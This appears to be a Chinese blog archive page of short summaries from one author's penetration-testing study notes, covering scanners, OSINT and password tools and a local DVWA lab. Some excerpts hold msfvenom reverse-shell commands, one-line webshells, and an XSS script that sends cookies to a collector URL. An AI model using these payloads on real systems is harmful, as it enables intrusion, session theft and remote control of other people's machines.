2022 年 7月随笔档案 - Augustone

世界各国公网ip地址

摘要：https://www.nirsoft.net/countryip/ https://worldpopulationreview.com/country-rankings/ip-address-by-country https://ip-geolocation.whoisxmlapi.com/sta 阅读全文

posted @ 2022-07-22 19:33 Augustone 阅读(3356) 评论(0) 推荐(0) 编辑

渗透测试工具表格

摘要：共九类可用工具，选择其中的五种体量与功能简陋平均丰富小型小而简陋（舍去）小而适中（！！）小而强大（！！！）中型中而简陋（舍去）中性且可用（！！）中型而强大（！！！）大型大而简陋（舍去）大型且可用（舍去）大型且强大（！！！）阅读全文

posted @ 2022-07-22 14:02 Augustone 阅读(44) 评论(0) 推荐(0) 编辑

Live Host

摘要：一，arping arping 192.168.2.105 sudo arping -i wlan0 -c 6 192.168.2.105 sudo arping -d 192.168.2.105 sudo arping -c 6 -i wlan0 2c:37:c5:0f:21:49//不灵二，f 阅读全文

posted @ 2022-07-22 12:43 Augustone 阅读(73) 评论(0) 推荐(0) 编辑

Dns相关

摘要：一，dnsenum DESCRIPTION：Supported operations: nslookup, zonetransfer, google scraping, domain brute force (support also recursion), whois ip and reverse 阅读全文

posted @ 2022-07-21 13:49 Augustone 阅读(64) 评论(0) 推荐(0) 编辑

tcpdump

摘要：sudo tcpdump -nt -s 500 port https sudo tcpdump -nt -s 500 port domain 阅读全文

posted @ 2022-07-21 13:44 Augustone 阅读(18) 评论(0) 推荐(0) 编辑

GVM ，new name of openvas - powerful tool!

摘要：Open Vulnerability Assessment Scanner 需要在setup过程中安装所需扫描部件，耗时很长。 OpenVAS is a full-featured vulnerability scanner. Its capabilities include unauthentic 阅读全文

posted @ 2022-07-20 21:06 Augustone 阅读(217) 评论(0) 推荐(0) 编辑

BloodHound与域和AD权限有关的一个应用

摘要：BloodHound是一种单页的JavaScript的Web应用程序，构建在Linkurious上，用Electron编译，NEO4J数据库是PowerShell/C# ingestor. BloodHound使用可视化图来显示Active Directory环境中隐藏的和相关联的主机内容。攻击者可阅读全文

posted @ 2022-07-20 20:48 Augustone 阅读(30) 评论(0) 推荐(0) 编辑

OWASP ZAP 非常强大的web应用扫描器

摘要：OWASP，Open Web Application Security Project 有被动（即手动通过zap代理方式，类似于burp）、主动、攻击等方式，其中ssl代理方式时须导出zap的cert至浏览器。plugin can be upgraded 阅读全文

posted @ 2022-07-20 20:39 Augustone 阅读(116) 评论(0) 推荐(0) 编辑

nikto扫描

摘要：nikto Options: -ask+ Whether to ask about submitting updates yes Ask about each (default) no Don't ask, don't send auto Don't ask, just send -Cgidirs+ 阅读全文

posted @ 2022-07-20 19:58 Augustone 阅读(69) 评论(0) 推荐(0) 编辑

aemitage，metasploit的gui版本。useful

摘要：如题，有用阅读全文

posted @ 2022-07-20 12:24 Augustone 阅读(25) 评论(0) 推荐(0) 编辑

密码嗅探

摘要：1，sudo dsniff -i eth0 阅读全文

posted @ 2022-07-20 12:23 Augustone 阅读(26) 评论(0) 推荐(0) 编辑

commix,useful

摘要：commix -u http://192.168.2.105:9079/dvwa/vulnerabilities/exec/ --cookie='PHPSESSID=263l880ue37mjt0e2h0fecled5; security=low' --data='ip=127.0.0.1&subm 阅读全文

posted @ 2022-07-19 22:14 Augustone 阅读(32) 评论(0) 推荐(0) 编辑

spiderfoot，对网站进行爬取式扫描。攫取各种信息。有用

摘要：SpiderFoot 是一种侦察工具，可自动查询 100 多个公共数据源 (OSINT)，以收集有关 IP 地址、域名、电子邮件地址、名称等的情报。您只需指定要调查的目标，选择要启用的模块，然后 SpiderFoot 将收集数据以建立对所有实体及其相互关系的理解。 spiderfoot -l 0.0 阅读全文

posted @ 2022-07-18 13:42 Augustone 阅读(218) 评论(0) 推荐(0) 编辑

recon-ng从多个源头搜集主机和域名，但需要apikey。不大好用

摘要：[95] Recon modules[8] Reporting modules[4] Import modules[3] Disabled modules[2] Exploitation modules[2] Discovery modules[recon-ng][default] > helpCo 阅读全文

posted @ 2022-07-18 13:29 Augustone 阅读(37) 评论(0) 推荐(0) 编辑

legion:使用多工具分门别类地扫描多个目标，有用

摘要：Gui工具，不错儿阅读全文

posted @ 2022-07-18 12:53 Augustone 阅读(75) 评论(0) 推荐(0) 编辑

dmitry

摘要：Deepmagic Information Gathering Tool"There be some deep magic going on"Usage: dmitry [-winsepfb] [-t 0-9] [-o %host.txt] host -o Save output to %host. 阅读全文

posted @ 2022-07-18 12:20 Augustone 阅读(103) 评论(0) 推荐(0) 编辑

linux 头文件

摘要：安装驱动前安装头文件 https://linuxhint.com/install-linux-headers-kali-linux/ linux-headers-5.18.0-kali2-amd64_5.18.5-1kali1_amd64.deb 阅读全文

posted @ 2022-07-18 11:31 Augustone 阅读(92) 评论(0) 推荐(0) 编辑

account/username&password tool

摘要：1,Xhydra Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f 阅读全文

posted @ 2022-07-17 23:33 Augustone 阅读(74) 评论(0) 推荐(0) 编辑

skipfish: web scaner, usefully

摘要：一， -I 只检查包含′string′的 URL skipfish -o test -I /aiyou/ http://192.168.1.104 -X 不检查包含′string′的URL #例如：aiyou skipfish -o test -X /aiyou/ http://192.168.1. 阅读全文

posted @ 2022-07-17 21:22 Augustone 阅读(41) 评论(0) 推荐(0) 编辑

开源情报搜集工具

摘要：一， 1.Shodan（撒旦） 2.Spyse（间谍） 3.Google Dorks 4.Maltego（马尔特戈） 5.TheHarvester（收割者） 6.Recon-Ng（侦察） 7.SpiderFoot（蜘蛛脚） 8.Creepy（爬行）二， http://cn-sec.com/ htt 阅读全文

posted @ 2022-07-16 15:07 Augustone 阅读(298) 评论(0) 推荐(0) 编辑

常见靶场

摘要：一，https://zhuanlan.zhihu.com/p/362263705 二，https://www.modb.pro/db/233139 24个靶场 2.1，在线靶场 1. BUUCTF在线评测： https://buuoj.cn 2. Vulhub漏洞环境集合： https://vulh 阅读全文

posted @ 2022-07-15 17:26 Augustone 阅读(1061) 评论(0) 推荐(0) 编辑

maltego

摘要：https://www.maltego.com/ce-registration/?utm_source=maltego-suite&utm_medium=software 阅读全文

posted @ 2022-07-14 18:08 Augustone 阅读(35) 评论(0) 推荐(0) 编辑

antix

摘要：Installed softwarenmap,dnsenum,dnsreconcurl https://news.baidu.com |grep baidu.comwhoishydra/xhydrasudo apt-get install -y johnburpsuitesqlmaphashid, 阅读全文

posted @ 2022-07-13 19:23 Augustone 阅读(71) 评论(0) 推荐(0) 编辑

sql注入之盲注

摘要：sqlmap -v 6 -u "http://192.168.2.105:9079/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=iilgd85al5o2rcen81dj 阅读全文

posted @ 2022-07-13 17:26 Augustone 阅读(41) 评论(0) 推荐(0) 编辑

linux/windows自启动和行踪清理

摘要：rc.d rc.local etc/profile user profile crontab windows日志。日志文件。 os日志，app日志命令行历史阅读全文

posted @ 2022-07-11 20:36 Augustone 阅读(18) 评论(0) 推荐(0) 编辑

msfvenom，转

摘要：Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf msfvenom -p linux/x64 阅读全文

posted @ 2022-07-11 20:15 Augustone 阅读(28) 评论(0) 推荐(0) 编辑

口令嗅探sniffe

摘要：dsniff: 一个密码侦测工具，他能够自动分析端口上收到的某些协议的数据包，并获取相应的密码。dnisff支持的协议有FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP MS- 阅读全文

posted @ 2022-07-10 17:39 Augustone 阅读(332) 评论(0) 推荐(0) 编辑

windows 防火墙和UAC

摘要：1，防火墙 https://docs.microsoft.com/zh-cn/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior https://blog.csdn.n 阅读全文

posted @ 2022-07-09 17:27 Augustone 阅读(99) 评论(0) 推荐(0) 编辑

php执行linux命令

摘要：有六个函数，如 ucmd.php::::::::::::::<?php$cmd = "whoami";exec($cmd,$array);print_r($array);?> usystem.php::::::::::::::<?php$cmd = "id";$result = system($cm 阅读全文

posted @ 2022-07-08 20:19 Augustone 阅读(263) 评论(0) 推荐(0) 编辑

一句话木马

摘要：1，php文件中 <?php @eval($_POST[command]);?> 2，asp<%execute(request("1"))%> 3，aspx <%@ Page Language="Jscript"%> 4，java <% new javax.script.ScriptEngineMa 阅读全文

posted @ 2022-07-08 19:53 Augustone 阅读(128) 评论(0) 推荐(0) 编辑

XSS最关键的一步

摘要：1，发给攻击目标 <script>document.location='http://127.0.0.1:801/pikachu/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script> <script>document.location 阅读全文

posted @ 2022-07-07 20:07 Augustone 阅读(15) 评论(0) 推荐(0) 编辑

BlueZ --Linux上的bluetoth

摘要：https://www.cnblogs.com/Java-Script/p/11095648.html 阅读全文

posted @ 2022-07-06 11:00 Augustone 阅读(7) 评论(0) 推荐(0) 编辑

jsp/asp/php/python/jave/net/tomcat

摘要：https://www.zhihuclub.com/34330.shtml https://www.crazyengineers.com/threads/which-one-is-better-jsp-php-asp-net-python.41655 https://blog.csdn.net/qq 阅读全文

posted @ 2022-07-06 10:59 Augustone 阅读(5) 评论(0) 推荐(0) 编辑

Kali上安装VMware-player-full 16

摘要：1，下载和安装顺利 2，启动时需要linux的头文件。下载安装后启动仍无效。 3，github上下载、安装并编译 git clone https://github.com/mkubecek/vmware-host-modules.gitcd vmware-host-modulesgit checko 阅读全文

posted @ 2022-07-04 19:56 Augustone 阅读(161) 评论(0) 推荐(0) 编辑

07 2022 档案

公告

搜索

常用链接

我的标签

随笔分类

随笔档案

阅读排行榜

评论排行榜

推荐排行榜

最新评论